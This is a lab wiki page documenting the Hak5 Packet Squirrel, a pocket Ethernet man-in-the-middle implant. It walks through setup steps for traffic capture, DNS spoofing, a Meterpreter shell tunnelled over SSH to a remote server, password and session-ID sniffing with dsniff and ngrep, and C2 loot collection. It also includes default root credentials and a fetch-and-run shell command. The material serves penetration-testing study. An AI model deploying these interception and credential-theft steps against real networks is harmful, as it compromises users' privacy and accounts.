Hak5 Packet Squirrel

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search

Summary

Packet Squirrel device

The Packet Squirrel operates as an Ethernet Man in the Middle and comes preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing / Modifying DNS requests and Tunnel taffic through an OpenVPN tunnel. These can also be modified and exchanged with other scripts. It's stealthy pocket-size enables it to be placed without notice, this can come in handy for penetration testers. The efficient energy usage makes it possible to power it with a battery pack to run over a week. The Packet Squirrel can also be combined with the Hak5 Cloud C2, a command and control server specially for Hak5 devices.

The device brings following characteristics with it:

  1. Dimensions: 50 x 40 x 15 mm – small and lightweight with 24 grams
  2. Consumption: 0,12A using a Micro-USB-Port
    1. Can be run with a battery pack
  3. Ports: 2 x RJ45-Ethernet-Port | 1 x USB-Port for a flash drive | Micro-USB-Port for power supply
  4. OS: Runs a Linux platform with root access and common network utilities
  5. Hardware
    1. LED indicating the status of the device
    2. Payload Selection Switch to choose the respective payload
    3. Scriptable push-button to stop payloads with ease

Possible attacks with the Packet Squirrel

The Man-in-the-Middle Attack (MITM) is a popular cyber security attack which is described by an attacker interfering physically, or nowadays often logically, the communication between two or more network targets. Thus, the attacker gains complete control over the data traffic and can read, store, block, manipulate or delete the data traffic. The crux of the attack is that the attacker pretends to be the respective counterpart to the communication partners.

The MITM-Attack can be realized by another attack called Spoofing. Spoofing is when a hacker pretends to be someone known to an individual or network host to access confidential information. Spoofing can technically occur in many ways, among others ARP, DHCP or DNS Spoofing.

Community

Hak5 does not only provide the opportunity to use following payloads fluently and easy using the switch on the side but additionally fosters building a community regarding all there devices.

The Hak5-webiste provides a way of submitting self-made payloads or to ask questions in a forum. To promote the development of new payloads and to reward creativity, effort and collaboration Hak5 provides the possibility to submit a payload to “Hak5 Payload Awards” to receive a monetary reward in a hight of $ 2.000, -. The winner will be decided yearly by the voting community.

Through Hak5’s Github-Account payloads are made available to public and can be downloaded/cloned within the respective repository.

Description

SSH connect
spoofhost file
Spoofed browser warning

The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.

In Arming Mode (switch in 4th position, nearest to the USB port) you can easily access the device with ssh root@172.16.32.1 with the password hak5squirrel. Therefore Packet Squirrel acts as DHCP server. If you don't get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.

It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgoing Ethernet interface as well.

Basic Cable Setup

  1. Plug the victims Ethernet cable into the "Ethernet In" Port
  2. Plug the gateway Ethernet cable into the "Ethernet Out" Port
  3. Power the device by plugging in the power cable

Firmware Upgrade

Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.

The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.

Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel.

The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blue blinking LED.

Then you can connect again with SSH and verify the new version, shown in Figure "SSH connect".

Manual upgrade

It is also possible to manually upgrade the firmware of the Packet Squirrel by:

  1. Download the latest firmware from the website linked above and verify the checksum
  2. Switch into “Arming Mode” and power on the device
  3. Use SCP to transfer the file to Packet Squirrel’s /tmp directory. The appropriate command could be: scp upgrade-x.x.bin root@172.16.32.1:/tmp/
  4. Use SSH (command: ssh root@172.16.31.1) to connect to Packet Squirrel’s bash prompt and use the sysupgrade command (sysupgrade -n /tmp/upgrade-x.x.bin) to start the firmware update
  5. The process may take 5-10 minutes. Do NOT unplug the device during the process, otherwise the device could become inoperable.

Formatting the USB-Stick

The Hak5 Packet Squirrel can only operate with a USB disk that is formatted with an NTFS or EXT4 file system.

NTFS (New Technology File System) is a proprietary journaling file system that was developed by Microsoft and offers targeted access protection at file level and greater data security through journaling and is not limited to a file size of 4GB as e.g. FAT. Formatting is performed with following steps:

  1. On a Windows-machine:
    1. Find and open your file explorer on Windows
    2. Locate your USB-Stick in the left bar
    3. Select “Format”
    4. Set NTFS as file system using the drop down, tick “Quick Format” and click “Start”

EXT4 is the fourth extended filesystem that was developed for the Linux Kernel and like NTFS a journaling file system. Windows cannot directly format a USB-Stick to the EXT4 format and therefore there is a need for an third-party tool. A USB-Stick is formatted to EXT4 using following steps:

  1. On a Windows-machine:
    1. Download and install DiskGuard
    2. Select your drive from the left bar
    3. Select the “Format”-button at the top bar
    4. Select the wanted file system “EXT4” from the drop down menu
    5. Click “Format”

Payloads

Payloads can be stored on an external USB disk or on the device’s internal memory. On boot the device gives priority to payloads on the USB disk, other payloads existing on the internal memory will be overridden. If no USB disk is available, payloads stored on the internal memory are executed. Payloads on the internal memory are stored in /root/payloads and need to be called switch1, switch2 and switch3, payloads on an USB disk should be stored in /payloads/ and named accordingly.

Logging Network Traffic

This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on. Just follow these easy steps:

  1. A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up.
  2. Flip the first position (which is nearest to the micro USB power in).
  3. Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.
  4. Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.
  5. The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.
  6. Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.
  7. You can now analyse the captured pcap file, located in \loot\tcpdump with Wireshark.

After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.

DNS Spoofing Mode

This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.

  1. For this mode we have to start in arming mode (switch at fourth position)
  2. After gaining access with ssh we change to the DNS spoofing directory with cd /payloads/switch2.
  3. There we can define the Spoofed domain names by editing the file spoofhost with nano spoofhost.
  4. In the file add entrys like address=/myspoofdomain.at/194.232.104.140 as shown in figure "spoofhost file". The example IP belongs to orf.at. If all requests should be redirected to this IP address a # is needed (address=/#/194.232.104.140). Furthermore, It must be mentioned that the IP address of orf.at must be specified. The specification of orf.at itself does not work, as the Packet Squirrel does not resolve it into an IP.
  5. Unplug the Packet Squirrel and shift the switch to the second position.
  6. Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.

By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure "Spoofed browser warning" browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.

OpenVPN Mode

OpenVPN Tunneling Mode
OpenVPN Access Mode

An existing VPN server from freeopenvpn.org can be used for Tunnel Mode. To use the Access Mode, a separate VPN server must be set up. This requires a server with a static IP address to which you have full access for configuration. As part of a project at the FH Campus Wien, it makes sense to use the FH infrastructure. The hardware requirements for the server are very low with 2 CPUs and 2GB RAM. The self-hosted Server was used as OpenVPN (OVPN). This offers two free connections, which are sufficient in this case.

  1. Download the the OVPN access certificate.
  2. Set the Packet Squirrel in Arming Mode and connect to its shell
  3. Copy the certificate with scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn
  4. Steer to the directory with cd /root/payloads/switch3/
  5. Edit the config.ovpn at line 30 to auth-user-pass credentials.txt
  6. Add an credentials file with nano credentials.txt and add the two lines:
    1. freeopenvpn
    2. <the displayed password>
  7. Before starting the VPN we choose the VPN mode:
    1. Open the payload.sh
    2. Set the For_Clients= to
      1. 0 for Access Mode
      2. 1 for Tunneling Mode
  8. Now set the Switch the the third Position and plug power out and in again
  9. You are good to go, if the yellow LED starts to flash after the boot up sequence

Access Mode

Access mode allows the squirrel to access the VPN Network via the Secure Shell if the connection was established. Therefore you have to install an OpenVPN Client at another device like a Ubuntu VM as well. From this VM you can establish a tunnel to the VPN Server. From there connect via SSH to the Packet Squirrel.

The command ifconfig tun0 shows the following output when it is issued at the Packet Squirrels Shell.

tun0 
     Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
     inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0
     UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
     RX packets:12 errors:0 dropped:0 overruns:0 frame:0
     TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:100
     RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)

The Access Mode can be used to access an Private network from outside.

Tunneling Mode

The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with ipchicken.com.

You can also install an simple openVPN Server on a linux machine with wget https://git.io/vpn -O openvpn.sh && bash openvpn.sh and press Enter 6 times. Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.

Meterpreter-via-SSH

Packet Squirrel Payload Meterpreter-via-SSH settings

This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel. The intent is to hide the meterpreter network traffic behind a legitimate SSH activity. You can download this payload from the offical hak5 github.

Getting Started

Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server options:

  • SSH_USER - username on remote SSH server
  • SSH_HOST - ip address of remote SSH Server

Note: If you changed the default meterpreter port don't forget to change it on the metasploit side as well.

  • MSF_PORT
Generate SSH Key on Squirrel

Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:

root@squirrel:~# ssh-keygen
Allow Squirrel on SSH Server

Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:

user@server:~# mkdir ~/.ssh
user@server:~# echo 'paste id_rsa.pub contents inside this quote' > ~/.ssh/authorized_keys
Run Metasploit with Resource
msf@server:~# msfconsole -r server.rc

LED Definitions

  1. Configure NETMODE
    • Solid Magenta
  2. Connect to SSH Server
    • SUCCESS - Blink Amber 5 Times
    • FAIL - Blink Red 2 Times
  3. Launch meterpreter
    • SUCESS - Blink Cyan 1 Time
    • FAIL - Blink Red 1 Time

Hardening Recommendations

  1. Use an accout with limited privileges for SSH acces on the server.
  2. User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).
  3. Disable PasswordAuthentication in sshd_config on the server.

ISpyintel

Packet Squirrel Payload ISpyIntel settings

This payload will automate gathering various recon data on whatever passes between it's Ethernet ports. You can download this payload from the official hak5 github. Note: This payload requires a usb stick to store loot.

Setup

  1. Edit the config variables at the top. The main variables are:
    1. lootPath="/mnt/loot/intel" # Path to loot
    2. mode="TRANSPARENT" # Network mode we want to use
    3. interface="br-lan" # Interface to listen on
  2. Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.
  3. Connect into a target machine with access to the LAN.
  4. Set switch to the spot and power up.
  5. Leave, get coffee, take a nap while everything is recorded and parsed for future use.
  6. When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.
  7. When all is done the LED will just go blank. It is now safe to unplug and go about your day.

Tasks that are started

  • tcpdump - records every packet that was send and received
  • urlsnarf - collects all websites that were visited
  • dsniff - attempts to acquire passwords and what not
  • ngrep - on ports 80 and 21 with the filter for common password fields
  • ngrep - on ports 80 and 21 with the filter for common session id fields
  • log.txt - logs the progress of the payload for troubleshooting

Clean Up

Once the button is pressed the payload will automatically parse the TCPDump log file for the following items and store the results in seperate files. As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.

  • ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains
  • maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.

Creating your own Payloads

Ducky Script is the payload language of Hak5 and consists of several simple commands specific to the Packet Squirrel hardware and bash. The basic Ducky Script commands are describe below and include NETMODE, LED, BUTTON and SWITCH.

The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3. It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: #!/usr/bin/python, bash: #!/usr/bin/bash. Bash scripts can access the following pre-installed tools: openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget

The featured Squirrel Script offers the following additional commands:

  • NETMODE

specifies which network mode Packet Sqirrel uses and how traffic is routed

Command Description
NETMODE BRIDGE Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel
NETMODE TRANSPARENT Also creates a bridge between the interfaces but with no own IP address
NETMODE NAT Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel
NETMODE VPN same as NAT with VPN interface for client tunneling
NETMODE CLONE Clones the MAC address from the target client and uses it to connect to the LAN
  • LED

with this command the multi-color LED can be controlled.

Further information regarding the LED, its colors, patterns and states can be found here.

Possible configurations Description
LED Colors red, green, blue, yellow, cyan, magenta, white
LED Patterns SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000
LED State SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH
  • BUTTON

The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed.

Further information regarding the Ducky Script’s “Button” command like its return value, possible ways of configuring the wait time, LED color during the pause as well as the option to suppress the LED can be found here.

  • SWITCH

The SWITCH command returns the current position of the hardware payload selection switch. Output is "switch1", "switch2", "switch3" or "switch4".

Example and Best Practices

C2 server start
C2 Dashboard
C2 Packet Squirrel

As shown below, payloads should begin with comments specifying the name of the payload, a description, the author(s), the target, special requirements, category, netmodes and the LED status.

Configurable options should be placed on the top of the payload file.

The LED should be used regarding common payload states and not with unique pattern combinations. The LED command should precede the NETMODE command indicating a specific state like SETUP or even FAIL if specific conditions are not met. If a payload reaches a FINISH state, the Packet Squirrel is safe to power off.

Here is an example for the usage of Squirrel Script.

# Title: Caternet
# Author: Hak5Darren
# Version: 1.0
# Description: Forwards all traffic to local webserver hosting cat photos.
# Props: In loving memory of Hak5Kerby

LED SETUP
NETMODE NAT
echo "address=/#/172.16.32.1" > /tmp/dnsmasq.address
/etc/init.d/dnsmasq restart

LED ATTACK
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53
python -m SimpleHTTPServer 80

For more information go to the hak5.org webpage.

with Cloud C2

The Hak5 Cloud C2 is a command and control server for Hak5 devices. Installation and startup is shown in figure "C2 server start". By browsing to the configured address you can login to the dashboard, shown in figure "C2 dashboard".

To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure "C2 Packet Sqirrel". Then copy the downloaded file to the Packet Squirrel's /etc folder and reboot it. In the Overview tab you can also Edit, Reboot, Wipe and Remove your device.

In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.

Used Hardware

Packet Squirrel + Field Guide

References